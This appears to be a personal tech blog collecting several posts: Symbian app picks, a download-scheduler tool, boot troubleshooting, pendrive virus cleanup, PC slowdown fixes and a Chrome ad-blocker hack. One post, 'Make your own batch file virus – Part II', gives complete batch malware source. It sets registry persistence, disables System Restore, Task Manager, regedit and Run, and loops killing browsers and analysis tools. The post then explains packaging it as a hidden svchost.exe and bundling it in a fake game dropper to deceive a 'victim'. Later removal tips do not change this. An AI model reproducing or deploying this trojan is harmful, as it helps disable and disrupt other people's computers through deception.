The Last ‘Symbian’

It’s been quite some time since I blogged last. Things changed a lot since then. The new wave is smart phones.  And despite all the controversy that surrounds Symbian platform and Nokia abandoning it, there are many of us still using it, trying to squeeze the very last drops of productivity that still remains in these amazing devices that once ruled. This post is for those readers who still use Symbian s60v3 devices (E63, E71, E72, E5), and how they can be productive with their handsets.

The only differentiating factor which defines which platform trends is the choice and variety of application the platform offers. No doubt Android and iOS takes a lead in this space, Windows Mobile is emerging as an alternative. I will list out some amazing applications which make me continue to stick to Symbian while you get a clear picture of what you should do next.

Note: Before going ahead with installing the apps, I would suggest install latest version of Nokia suite and check for firmware updates.

BrowsingOpera Mobile:

Opera Mobile provides a great browsing experience. With mobiles with good resolution like E72, it’s amazing, and quite good with E5 as well. The new version Opera Mobile 12 with unlimited speed dials, with regular features like opera turbo, synchronize etc. suits all browsing needs.

Social networking: Gravity

Gravity is not just the most feature rich twitter client, but also the only decent Facebook client for S60v3. With applications like fMobi, Facial etc being available only for Belle and S60v5, Gravity is what you need for a decent experience on Facebook. For Twitter addicts, it’s a must have. It has notifications for Twitter and Facebook, alerts for Twitter (alters for Facebook are expected soon), can check-in to places using Foursquare, it is a total social networking package!

Chat: Nimbuzz

What I like about Nimbuzz is the fact that you can add all your chat accounts in this client. Be it Yahoo, Gtalk, Msn or Facebook. Also, you can make voip calls to Yahoo, Gtalk and other Nimbuzz users. With Nimbuzz ping, you are always connected, even when you the application closed.

Instant messaging – Whatsapp

What platforms like Android,  iOS and Symbian lacked was a feature like BlackBerry Messenger. This shortcoming was fulfilled by Whatsapp instant messenger. It links to your phone number and you can send unlimited messages to other Whatsapp users, share pictures, sound clips, Videos and your location. Best part, since it supports multiple platforms, you can now stay connected to your friends on other platforms.

Productivity – JBTaskman

When you use multiple applications on your phone, you will notice that the active home screen of your Nokia don’t have enough shortcuts and the default task manager isn’t handy enough. JBTaskman comes to rescue here. With this app you can make shortcuts to launch your favorite applications easily and manage running tasks. Also, it provides in-depth details of running processes and lets you manager them.

Theme: Nokia Evolve

Let’s agree on this one – S60V3 doesn’t look that fancy nowadays. Nokia Evolve theme, available on Nokia Store, pimps up the looks of your mobile with Symbian Anna icons. Your phone deserves to look nice.

Anti-theft: Theft aware

A theft aware application comes in handy to track your phone and to wipe it in case of an unfortunate eventuality of you losing the phone. This free application is very feature rich and has an interesting stealth mode.

Navigation: Nokia Maps, Google Maps

I believe Nokia maps available on your phone provide the best navigation experience. But to get finer details of a location, I would say Google Maps is what you must seek. Also, latitude feature is very interesting to play with.

Tethering: Joiku Spot

Want to host internet to a laptop which doesn’t have Nokia suite? Or your tablet which can use Wi-Fi? Tethering is what you are looking for. Joiku Spot can host a wifi hot spot which can be accessed by a Wi-Fi enabled device. The premium version is now available for free, and you can secure the access point you host with a password.

Some more interesting apps I would recommend are Voyager vHome, Vlingo, TuneWiki, CuteBox. These applications will help you stick to your Symbian device while you decide where you will be heading next.


Auto-connect Download scheduler

Auto-connect Support page

** Note** :

  • I have stopped working on this project. For users facing any issues, go through the comments on this post, which should help them. Other wise, you may drop a new query.

Auto Connect Download scheduler can be used to automate the way you connect to internet. Automate your download tasks by scheduling them, so that you can sleep in peace!

For Windows XP: DOWNLOAD V3.3.2

For Windows 7 : Download x64 V3.3.2

Note: Change log and links to download older versions available at end of page.

Note :

Creative Commons License
Auto-connect Download Scheduler by S.K.Aijazuddin is licensed under a Creative Commons Attribution 2.5 India License.


Ideal for limited bandwidth users who download during happy hours.

> New single Window GUI for easy operation.

> Compatible with Windows 7 too

> Schedule system wakeup, broadband connect and disconnect tasks.

> Schedule application run tasks, application close tasks.

> Schedule system shutdown task.

> Stores schedules of last run task for easy scheduling.

> Wake up password prompt security issue fixed.

> Schedule Auto-connect to run daily *New*

For first time users:

If you are running this application for the first time, follow this procedure –

Note: It is to be taken care that while scheduling tasks, the time is in 24 hours format and also that the default date shown is date today. Hence, if you are scheduling a task which is to take place tomorrow morning at 2 am, remember to change the date a day ahead.

And it is obvious that if time is already past 12 midnight, and a task to be run at 2am, date need not be changed.

Firstly, you need to tweak your torrent client a little.

Tweak you torrent client:-

  • Open your torrent client and go to settings\options. In TASK settings, select the option – ” Avoid system entering sleep\suspend mode when task running “. Apply. This will prevent your system from going to standby or hibernation when it’s idle during downloads.
  • Also in the same section, select the auto-resume tasks at program startup. This will make tasks start downloading when your PC wakes up at scheduled time and runs the client.
  • Also, go to built-in scheduler of bitcomet and set the download schedule time, like enable downloads during 2am to 8 am, and disable during the rest, this is for happy hours users. This will avoid downloads to run during off the happy hours period, even if you let the client run.

Note: When you add torrents, select the download now option or start the pending downloads after setting the schedule, later close the client, with tasks still set as running, this will make sure that the tasks  auto resume when PC wakes up and runs the application

Using Auto-connect : After having set up your torrent client, follow this procedure : ( One time task, data is stored after setting it once)

  • Add all download files in the torrent client, start all download tasks. Close ( quit ) the torrent client.
  • Enter the time to wake up, this is the time when you system will turn ON from hibernation mode.
  • Enter the time to connect the internet, and other data like user details ; or check the “I have a Always-ON connection” box. This connects internet or reboots the modem in always ON mode. Set this time suitably depending upon boot time of yours system. Note: In case of Windows 7, note the bootup time and time taken to initialize your modem into account to set this time, keeping a delay of 4-5mins after wake-up.
  • Enter the time to run the torrent client and also browse and select the application (client) to run.
  • Enter the time to close the torrent client and the time to disconnect the internet ( or reboot modem).
  • Enter the time to shut down the system.
  • If you want to run this schedule daily, check the Run this schedule daily box.
  • Click on Done and minimize the application. Hibernate the system.

You can schedule the tasks ( ie after pressing Done), minimize Auto-connect Window ( goes to tray) and continue using the system, browsing the internet. But remember to Hibernate it when you are done, don’t shutdown the system. You can leave it powered ON or in stand-by as well.

When scheduled to run daily, just click on Done button and minimize. Auto-Connect will start on system startup, minimized, and tasks schedules ( ie controls grayed). Every time you want the tasks to run that night, hibernate the system that night instead of shutdown. If you cancel or close it, it will cancel the tasks, and not run on startup the next time onwards.

Also, in windows 7,when the application is scheduled to run daily, Windows asks for UAC permission prompt everytime program starts at system startup. You may disable the UAC to avoid this prompt. Microsoft doesnt specify any other way to disable UAC messages for one particular program.

Caution: By default, when you install the application, hibernation is turned on. To hibernate, click on turn off button in star menu and when the window appears, press hold the SHIFT key, the stand buy button changes to hibernate. Now holding the shift key, press the hibernate button to hibernate. Also, it is advisable to make a full demo run of Auto-connect on your PC, this is to ensure any run time issues that arises due to Antiviruses and firewalls can be taken care of.

Caution: For Windows 7 users, Telnet is disabled by default . If you are a Always ON user, you need to enable it to make modem reboot work.

1. Go to control panel and click on Program and Features option.

2. Click on Turn windows features on and off and in the pop up window, scroll to Telnet client and check it. Click OK and wait for it to finish.

Change log:

V3.3.1            Download x86 Download x64

  • Added better modem reboot logic
  • Added task cancelling feature.
  • Added browse feature to select the application to run.
  • Improved GUI for better visibility
  • Application data stored at a secured location ( in Windows directory)

V 3.3 Beta

  • Added inbuilt modem reboot support. No reboot modules required.


  • Single window for both Bridge and PPPoE.
  • Windows 7 compatible x64 reboot modules.
  • Stores the task and connection details.

V3.1 Beta

  • Fixed continuous hibernate-wakeup bug, added shut down instead of sleep.
  • Fixed the password prompt security bug. No need to manually disable it on systems with user passwords.

V3.0 Beta

  • Single window version ( Beta release)
  • Windows 7 compatible


  • Bug fixed in task deletion feature.


  • Bug fixed in task deletion feature.


  • Added task cancelling feature to delete old tasks.


  • Fixed bug which didn’t allow spaces in connection names.
  • Corrected little details in help and in GUI.
  • Altered the GUI for more convenience.

V 2.3 –

  • Added sleep tasks.
  • Improved modules for always on type connections.
  • Added help and created support page.


  • Added user data correction
  • Added support for always on modems
  • Added multiple tasks creation feature


  • Added internet disconnect task feature
  • Minor bugs fixed


  • First version with GUI.
  • Beta release and limited fucntionality.


  • Corrected false positives with few antiviruses due to packaging softwares.


  • Corrected some major bugs and improved functionality


  • First release of Auto-connect.
  • Featured DOS interface, which was complex, though worked.

Boot Failure

Have you ever experienced an issue when your PC fails to boot up? This means you are not able to see any thing on your monitor, not even the POST screen. Many people panic and run to a technician, but usually the problem can be solved very easily at home. In this post we will learn how we can solve such an issue.

When we turn on the PC, the BIOS runs POST (Power On Self Test), in case it finds an error in critical components, system doesn’t boot. The reasons can be many-

Basic: Check if there are any power signs to the CPU, like power light, or fan sounds etc. In case not, check if the power cable to CPU is fixed properly and if the supply fuses are intact. Use a multi-meter to confirm, else connect your hair drier to the line! 5-6% cases are a cause of supply failure, not related to PC at all.

RAM: The most usual issue involves your RAM. A loose contact in RAM contacts means your PC powers up, fans blow, no display on monitor, and PC restarts. And this cycle continues. The solution is to remove the RAM from the slot and first wipe it clean with a cloth. Dust off any dust in the RAM slots. Clean the RAM pins with a clean non dust eraser (This is to remove any deposition of carbon that might have come over time) and wipe it clean again to remove eraser dust. Re-fix your RAM back and boot again. This usually solves the issue 50 % of the times.

In case you still don’t boot up, go to next step.

Fans: Fans too, particularly the processor heat sink fan, if not functional, can lead to boot failure. Re-fix the power cable to the fan and also clean the heat sink and apply a fresh layer of heat sink compound. Usually motherboards have a BIOS feature that checks overheating and shuts down PC to prevent damage. This feature plays role here. Cleaning and application of fresh heat sink paste layer must solve the issue.

Power shortage and failures: Firstly verify all the power cables are fixed tight. If ones to mother board are loose, it results to boot failure. PC fails to boot up in case there is a power shortage too. This occurs at three levels.

Temporary– Here the voltage drop in your home causes failure to boot. This can be easily noticed with dim lights in room. In this case, stay calm and wait until supply gets normal.

Internal– This occurs on addition of any new hardware to the system, which consumes a lot of power, particularly high end graphic cards. Your PSU should be in a position to support such needs, else it results in lower voltages to components and PC fails to boot up.

Permanent– This arises on account of a faulty PSU. This can be caused by a power surge, burning capacitors or the transformer of the PSU. To check if the PSU is working properly, do this trick. Take a small piece of wire and connect one end in GREEN wire port and other in the BLACK. Switch ON the supply. If the fan in the SMPS is working, the SMPS is good, check loose contacts. Else, you may need to call the technician here.

Some other tricks: Resetting CMOS too sometimes solves the issue. Just remove the little disc battery on the motherboard and re-fix it. This will reset the CMOS. In case still it doesn’t help, remove all cables, and re-fix them.

There is a possibility that there can be a defective RAM. Here, if you have two cards, switch cards, one at a time and see if the PC boots up. Else try fetching a RAM of same bus speed & type and fix it in and check if it helps.

Also a faulty SMPS needs a repair or a replacement. Technician is called for here. Some times damage is much deeper which can’t be easily detected. You can approach your product care for more help. But this is really rare, 75% cases are solved by above tricks.

Pendrive autorun viruses

Follow these tips to avoid infections from pendrives and also see tips on how to remove autorun based viruses.

  • Always scan the media before accessing its contents. Keep your antivirus up to date. If you find that the icon of media has been changed from default drive to a folder or something, that means you are carrying an infection in your drive.

  • Instead of auto running the device, click on explore, this avoids malicious code from being executed by mistake if it escapes anti virus data base. Upon right clicking on your media, if the there is autorun on top instead of open or when some unknown language being displayed, be certain you have a virus waiting to execute on double click.
  • Beware of suspicious looking files. Always uncheck the “hide extensions for known file types” option in folder options. This lets you keep an eye on suspicious stuff like a folder with “.exe” extension, a media file with “.avi.exe” extension etc. Same implies to New folders that pops out of nowhere. Usually virus files set themselves super hidden attributes to avoid being seen.

Note: Super hidden files means system files, i.e. those files that comes visible when you go to tools-folder options-view-and tick show hidden files and folders and untick hide operating system files. In DOS it is called SH attribute, SYSTEM HIDDEN or nick named super hidden.

After enabling show hidden, uncheck hide protected OS files and uncheck hide extension, delete all folders carrying a .exe extension. Also delete the COM, BAT files and recycler folder in the pendrive.

Note: Recycler folder is present on NTFS volumes and it is the space you allot to recycle bin for that drive. A recycler folder on your partitions is a system folder, which stores the files in your recycle bin. But we know when we delete the files from pendrives, they are permanently deleted, doesnt go to recycle bin, hence this means there is no system recycler folder on pendrive. Also, pendrives are usually formatted in FAT system, and in FAT, there is no recycler folder, its called RECYCLED there! Thus,  any recycler folder on a pendrive got a trojan inside it, which is usually run by autorun.inf files.

  • Keep track of files that you have on your pen drive/hard disk. Any new file with a suspicious extension should be avoided to be innocently checked.
  • There may arise an occasion when you see that opening your folders take a hell lot of time in your pendrive. Point to any folder and see its size. If a folder containing a movie shows a size of 300 Kb to 1 Mb, this means your pendrive and your PC is infected now. These kind of viruses when they enter our pendrive hides all folders available in it and set up their off springs which are .exe files but carry icon of a folder and names of your folder. When ever you double click these files, tricked that they are your folders, the code executes and then the virus takes you to the folder which is actually hidden to avoid suspicion.

Or there may be a lucky occasion that on scanning your pendrive before access, your antivirus detects a lot of infections and deletes them. But on opening your pendrive you find all your folders missing. They are actually super hidden now.

In case you find that your system isn’t showing you hidden files/ super hidden files, that means your system is in grip of an infection or an infection had made a malicious entry in system registry.

Firstly download Malwarebytes, install it and run a full scan. Then download the registry defaults tool and run it to restore registry defaults, this enables the disabled features. Restart to fix the issue.

But if you want to change back the attributes of the SH folders and files back to normal, it cant usually be done by file\folder properties. Use command prompt and attrib command to do that. Open a new cmd window and write & execute this command-

attrib -s -h -r X:\*.* /s /d

where X: is the drive letter of your removable media.

  • In case you end up executing a suspicious code, check in task manager if you got a new process running. It can stopped temporarily from there. But the damage to registry can’t be easily undone. Use application like process manager if you find your task manager has been disabled. Use kill box to delete the malicious file. In case you arent comfortable removing it manually, scan PC with Malwarebytes.
  • Always try to recognize processes in task manager from time to time, especially when you install new applications. This helps you identify foreign processes running in case of a virus infection. Enthusiasts can use the application InstallRite to keep eye on all files and registry entries copied by an application install. Half the job is done when you identify the virus in processes.
  • Create a folder AUTORUN.INF in all your drives and hide it for convenience. ( E.g. – create the folder just inside C: drive, another in D: drive etc.) This makes sure that malicious codes aren’t able to autorun themselves on double clicking the drives. Same case implies to your pendrives, create a folder of specified name and avoid malicious code execution.

Note: Many viruses that spread from flash drives use a mechanism of autorun to spread. They copy themselves to target drive and make a autorun.inf file having code that makes the virus execute whenever the drive is double clicked (note carefully, it’s a file not folder). If we have made a folder named AUTORUN.INF, already present in our drives, the autorun.inf file made by virus can’t be created, since a folder and a file can never have same name at same location. A file can replace a file, a folder can replace a folder, but a file can’t replace a folder. Hence, even though the virus copies itself to your pendrive/system drives, it isn’t executed even on double clicking the drive.

If your drives aren’t opening on double clicking or opens in a new window, there must be a super hidden autorun.inf file in your drive root. Search for it, delete it and restart. This fixes the problem. You can also use killbox to delete the autorun.inf files as shown below-

  • Ever annoyed by file not getting deleted, renamed, or pendrive being not safely removed with file in use error? The solution is- Unlocker. This little tool installs a explorer extension that comes visible when you right click on a file or drive. Unlocker displays all the processes using (or locking) the file/ folder/drive. This locking handle can prevent the file from being deleted or renamed or prevents the pendrive from being safely removed with drive/ file in use error. In that case, just right click on the object and click on unlock. A list of applications using the object is displayed. Click unlock all and proceed.
  • Keep an eye on applications registered at startup using the tool Autoruns. Find them in logon tab. If you ever feel you executed a malicious file, check the startup and delete the malicious file autorun entry ( remember to see the key too, since it points to address of malicious file, which too has to be deleted ).

Make your own batch file virus – Part II


It’s been a while that the post Eradicate malware have been helping many fix malware issues, but over the time, malware have evolved too. There are new tricks up its sleeves and other surprises that will make you look ahead to the most miserable option – to reinstall your windows. With the sole motive to learn a few more strategies that malware employ to put us into trouble, we make our own malware and see it work. This will develop in us a lot of understanding how malware cause trouble, even preventing antivirus programs to remove them. This will eventually make us skilled enough to catch loop holes in malware that can be exploited to get rid of it, and we do the same at the end of the post. Now, leaving behind our good intensions, let’s put on our masks and enter the darklab!

In a previous post we had learned to make a basic batch file virus , learning a few DOS and batch basics, which did a little mischief. Well, this time we gonna turn a little more mischievous! The issue with our virus was that it ran a few tasks and later terminated, but this time, we gonna make it run continuously in a cycle, causing little close to what can be called havoc!

This time we will make a virus that will alter registry to start at startup and also place restrictions that will make removing it tough. Like many other malware do- disable system restore, disable registry editing, disable task manager, disable run, and disable folder options as well. In short, a tough one to catch hold of manually! And the virus will remain active in memory, running a process that will monitor your activity and prevent you from running any browser or IM client.

Since we have had discussed how we move around in DOS environment, we will directly speak of motives and how we accomplish them. Our main virus will as usual be a single executable. This file will be a decoy, tempting our victim to open it, posing as a crack or a game. Upon successful execution, this will launch out first batch file that will plant the main virus, another executable file at a secure location and then execute it. Hence, we see how a seemingly legitimate program causes you harm; this is what is called a Trojan horse planter. This launcher can be made to run a legitimate application at the end too, making us less suspicious of what we did in background.

As soon as the virus is planted, it is executed and the second batch file is run, that makes startup entries, apply restrictions and then as planned, runs a loop that will continuously trouble you. The point to be noted here is that the loop can either just carry out the aimed task, which is closing all internet applications in our case, or will carry out the aim and continuously refresh restrictions. In the latter case, unless the malicious process in memory is stopped, registry defaults tools fail to help you; and this is what is happening in newer viruses. It is also important to be mentioned that the registry key responsible for opening the exe files is also being edited by most viruses nowadays, making us helpless since we cant run or install our dependable antivirus. We don’t include this feature in our virus since it crosses the fine line between a prank and a dirty crime.

Thus, you can’t view the virus file, that will be super hidden, nor will you be able to restore registry defaults, which is relaxed in this case fearing avoiding the worst in case you execute the virus yourself…!

Having learned what we are going to do, we head towards code part. Open up a notepad file and key down this code, this will serve as our main batch file.

force.bat code:


REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v winlogon /t REG_SZ /d %windir%\system32\config\svchost.exe /f

reg add “HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore” /v DisableSR /t REG_DWORD /d 1 /f

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

REG add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFolderOptions /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f


taskkill /F /IM taskmgr.exe /IM procexp.exe /IM firefox.exe /IM chrome.exe /IM iexplore.exe /IM yahoomessenger.exe /IM autoruns.exe

goto loop

After entering the code, go to save as, save this file as force.bat , while keeping save as type as All files. Now, download Bat to exe converter and convert this batch file to an exe file, while keeping options as instructed below:

  1. Set visibility as invisible application.
  2. Set working directory as Temporary directory.
  3. Set temporary files to delete at exit.

In the version information tab, choose an icon file of a DLL and compile the batch file. You will get an exe file that will have icon of a DLL file. Rename this file to svchost.exe, this name and icon will serve as our decoy. Than change the attributes of this file to hidden, if you desire, so that naked eyes don’t find it. Use the attrib command as discussed in the previous post.

Now, the virus is ready, we need a planter that will launch the virus on your PC.  For this we code this launch batch file as follows.

Launch.bat code:

@echo off

move /y svchost.exe “%windir%\system32\config\”

start %windir%\system32\config\svchost.exe

start game.exe


Notice that you will need an application that will run after you run the planter, to avoid suspicion. This is a small flash game named “game.exe” in our case. And we choose icon for our launcher as a game icon. If you want it other way, you can choose an mp3 icon, and change the code as –

start song.mp3

And include into launcher a song that will be played once the launcher is executed.

After the file have been coded, name it as launch.bat . Now, we get a small flash game & an icon for it and run bat to exe converter. Choose options as we did in previous case and set the icon file as well. But this time, go to include tab and select add option and add the previously made svchost.exe file and the flash game, renamed to game.exe. Now compile this and of virus is ready.

It is an innocent looking application, claiming to be a flash game, having icon of a game, which is really tempting to try a hand on. Once executed, the contents- The launch.bat, svchost.exe and game.exe are extracted in temp folder and launch.bat is run. As programmed, the launch.bat file will move the main virus svchost.exe to config folder in system32 directory and run it. At the same time, it will run the game that is extracted in temporary folder. This way, the victim sees a game start and doesn’t suspect our Trojan planter. Now our planter has done its job and the main virus is into its place and has been run.

The main virus named as svchost.exe, even if seen through some process monitor tool, looks like a windows application, with icon of a DLL. This virus will anyways disable task manager, so that it can’t be end tasked. It also disables folder options, which prevents victim to search for it since it is super hidden. It also disables run, so that user cant launch applications like group policy editor. It disables registry editing; hence any attempt to import registry will be rejected. And then it goes into a continuous loop that will close Internet explorer, Chrome, Firefox and Yahoo messenger. You can also include other unwanted applications into this list, like process explorer, autoruns tool, malwarebytes etc. Hence, it’s a complete havoc!

Now coming to removing such nasty viruses, it goes by trial and error at first. You try system restore, its disabled, no restore points are available; you try opening task manager, it’s disabled. You try restoring registry defaults, its disabled too. Also process explorer and autoruns fail to start too.

Firstly, since the tools like Process explorer and autoruns can’t be disabled through registry (unless EXE file association is edited, which wont allow you to run any exe file), you will rename them and then run them. Since the virus was monitoring image name and end tasking it, it can’t stop the altered image name. Now, in process explorer, we analyze each of the processes. We notice a suspicious extra svachost.exe, which is running from system32\config folder, which blows its cover. We end task it and delete it. Now running autoruns, we remove its startup registry key as well. Now, the malware is gone, just the alterations in registry remains. Hence, you try cmd. Go to system32 folder and run cmd from there. In cmd, you edit the key which disables registry editing.

REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

This lets you edit registry now. Import the defaults.reg entries and this must fix the rest of the issues. Note that system restore will have to be manually enabled from group policy editor GPEDIT.MSC.

Hence we see that even smarter viruses have loop holes that can be exploited and used to get rid of them.

Note: Booting into safe mode is a favorite option for many, since startup isn’t loaded. But viruses now alter the USERINIT registry key and attach itself to it, hence starting in safe mode too, making the attempt fruitless.

Deeper Reasons For a Slower PC

We have already gone through various reasons which can be held responsible for a slow PC in the previous post revitalize your-computer. But there are some other reasons worth discussing that can cause your PC to crawl. They are the windows services- page file fragmentation, MFT fragmentation and indexing service.

Page file fragmentation: Paging involves the concept of virtual memory, i.e., when there is a shortage of system memory ( RAM), the computer pages certain processes on HDD reserved space called the virtual memory, and hence, the HDD is used as virtual RAM. By default, the page file is assigned on the OS drive. Since already the system is accessing the OS drive for running the windows, it makes sense in assigning the virtual memory on some other drive, where space is plenty and which isn’t used frequently. But over the time, if that drive is used, the page file can get fragmented. Page file fragmentation can lead to serious slowdowns, particularly when you use resource consuming applications. There are two simple ways to correct this issue.

  1. Download Pagedfrg tool from sysinternals.  This tool will defragment your paging file at startup during next reboot. Using Pagedfrg, you can also see how many fragments your page file is broken into. If its one, it’s intact. If it’s more, go for defrag.
  2. The other way is to simply delete the paging file and recreate it. This can be done in this way-

Right click on My computer > Go to properties > Click on Advanced tab > Click on settings button under performance section. In the new pop up window, click on advanced tab > Under virtual memory section click on change button. Now, click on drive where paging file is assigned and check the No paging file option. Click set button and click OK.  Now again go to change, and under a drive having plenty of space, select custom size and enter a size 1.5 times your RAM. This must recreate the paging file as a single unit.

Indexing service: Windows was created to be pretty organized. So much so that it will keep track if all your files and folders by indexing them, so that when you search for a file using the default search option, you can find it easily. But usually search is used rarely and the indexing service is running continuously in back ground which results in consumption of resources. This is can be avoided by disabling the indexing service and disabling the indexing of drives.

  1. Right click on a drive and go to properties, there uncheck the ‘Allow indexing service …’ option and apply.
  2. Go to run, type SERVICES.MSC and press enter. In the opened window, search for indexing service and disable it.

This frees up memory and a little HDD space as well.

MFT fragmentation: The Master File Table is the heart of NTFS file system. The MFT is a list of all files on the drive partition and their location on the drive. Very small files are actually saved directly to the MFT under their entry. In NTFS each file and file fragment contains a copy of its MFT entry so that if you have a crash you do not get lost file fragments since windows can just look at the file fragments and find where they belong. This explains why we don’t get any check disk recovered fragments while we use NTFS system.

Windows allot by default 12.5% of disk space reserved for MFT. This is to give space for MFT to grow. In actual practice I have never seen MFT grow more than 100 MB!  Hence I recommend it is enough if you keep it to default setting. Basically as we continue adding files, though MFT never crosses the assigned reserved space, still space reserved is allotted on some other drive when you use that drive saving large files ( remember all those movies you downloaded to your C drive using torrents?? ). Hence, now MFT is fragmented, which leads to degrade in system performance.

One way to fix it is to re-partition your hard drive, or at least format it to fix localized fragmentation, this way space is reassigned and make sure this time that you don’t fill it to the brim. The other way is to use disk keeper to defragment MFT at boot time.

Disk keeper is a real good application, which will take care of MFT fragmentation issues on its own, and check page file fragmentation as well. This way your file system stays healthy. A healthy file system is the base for a healthy PC !

Plug-ins for Chrome

Plug-ins for Chrome, Chrome fights back …

*** Note : With release of stable version 4.0 onwards, chrome got extensions working on stable channel too. This post hence just remains like a little antiquity which reminds us of old days ***

Firstly, being sport, I will have to admit the fact that the major chunk of internet users use Firefox … But the striking fact is that its not because of the features it offer, but its due to the fact that other guys too use it. As a matter of fact, many users of Firefox don’t utilize the range of features it offers.

Enter Chrome, which got into picture in December 2008, and managed to strip off pretty good number of Firefox loyalists to its side. Chrome sports an innovative look that is often referred to as you either would love it or you won’t. The most important feature of chrome is its speed. Open the application in a blink of a second and load the web pages much sooner than other competitors.

But the major drawback which Chrome suffers is lack of any plug-in mechanism in stable channel, which gives an edge to its competitor Firefox, which has a rich collection of plug-ins available. Chrome rolls out its new versions in three categories-

a. Stable versions – These are updated not too often and are updated only once the new version is found to be very stable. As of now, stable version doesn’t support plug-ins.

b. Beta versions – These are updated nearly monthly, new features constantly being added. They are a little unstable at times, the next update fixing it. New beta versions have been added with plug in system.

c. Dev versions- These are the development versions, the newest ones which are released nearly weekly. They can get very unstable. These ones support add-ons, and developers are making a plenty of them.

Here, we will learn to embed a popular Ad removing plug-in, called Adsweep, and use it in stable channel chrome.

Nearly all websites put Ads on them to generate revenue … Yahoo puts Ads of matrimony and newer version of Yahoo messenger, Piratebay and Isohunt sport pics of half stripped chicks which gets annoying if you are being watched, would you not like to strip them off fully, from the browser page I mean … :p !! And other Ads of online games, software applications etc which keep on appearing on nearly all web pages. If you aren’t interested in any of them, it makes sense to get rid of them, since not only do they consume bandwidth (though merely little), but also diverts attention!

Firefox have a plug-in AdBlock that works wonders, but what about we chrome loyalists? Developers fought back and came out with AdSweep. It is pretty good in blocking Ads and can be relied upon. One drawback is that it requires little tricks and gimmicks to get it working. For this reason I am working on making an installer for the same to ease the task, though I don’t promise, will try to get it done soon. Follow these steps –

1. Download this java script file here .

2. Go to this directory –

C:\Documents and Settings\<user>\Local Settings\Application Data\Google\Chrome\User Data\Default\

In the above directory, make another directory named “User Scripts”. Inside this directory, paste the saved java script.

3. Right click on the Chrome short cut on desktop and enter its properties. In the Target field, you will have an entry like this –

“C:\Documents and Settings\Aijaz\Local Settings\Application Data\Google\Chrome\Application\chrome.exe”

Add ”  –enable-extensions –enable-user-scripts to the end of it.  Hence, it becomes –

“C:\Documents and Settings\Aijaz\Local Settings\Application Data\Google\Chrome\Application\chrome.exe”  –enable-extensions –enable-user-scripts

4. AdSweep has a bug which makes it not to work if window is launched from other place like a chat message or a hyperlink on documents etc. To fix the issue, edit these registry keys to these values –

a.) HKEY_CLASSES_ROOT\http\shell\open\command

The default value is like-

“C:\Documents and Settings\Aijaz\Local Settings\Application Data\Google\Chrome\Application\chrome.exe” — “%1”

Simply add ” — enable-extensions –enable-user-scripts — ” in between, as shown –

“C:\Documents and Settings\Aijaz\Local Settings\Application Data\Google\Chrome\Application\chrome.exe\” –enable-extensions –enable-user-scripts — “%1”

Similarly edit these entries to these keys –

b.) HKEY_CLASSES_ROOT\https\shell\open\command

Key: C:\Documents and Settings\Aijaz\\Local Settings\Application Data\Google\Chrome\Application\chrome.exe\” –enable-extensions –enable-user-scripts — “%1”

c.) and, HKEY_CLASSES_ROOT\ftp\shell\open\command

Key: C:\Documents and Settings\Aijaz\Local Settings\Application Data\Google\Chrome\Application\chrome.exe\” –enable-extensions –enable-user-scripts — “%1”

Now, go to and see that there is no Ad on the top and a red box on upper left side notifies the version of AdSweep installed. Now on, you can surf the internet without caring for annoying ads. Adsweep was closed some time ago and the project have started again, but this time there is no support for mainstream chrome. Hope Google is soon going to enable API which will let us embed plugins on stable versions too.

You can download other popular plug-ins for chrome from this website and embed them too.

Though Chrome has many advantages over rival browsers, lest Google itself develops a plug-in integration system, Chrome will continue to face adversaries. But Chrome has always had its loyal knights, who are ready to fight back for her!!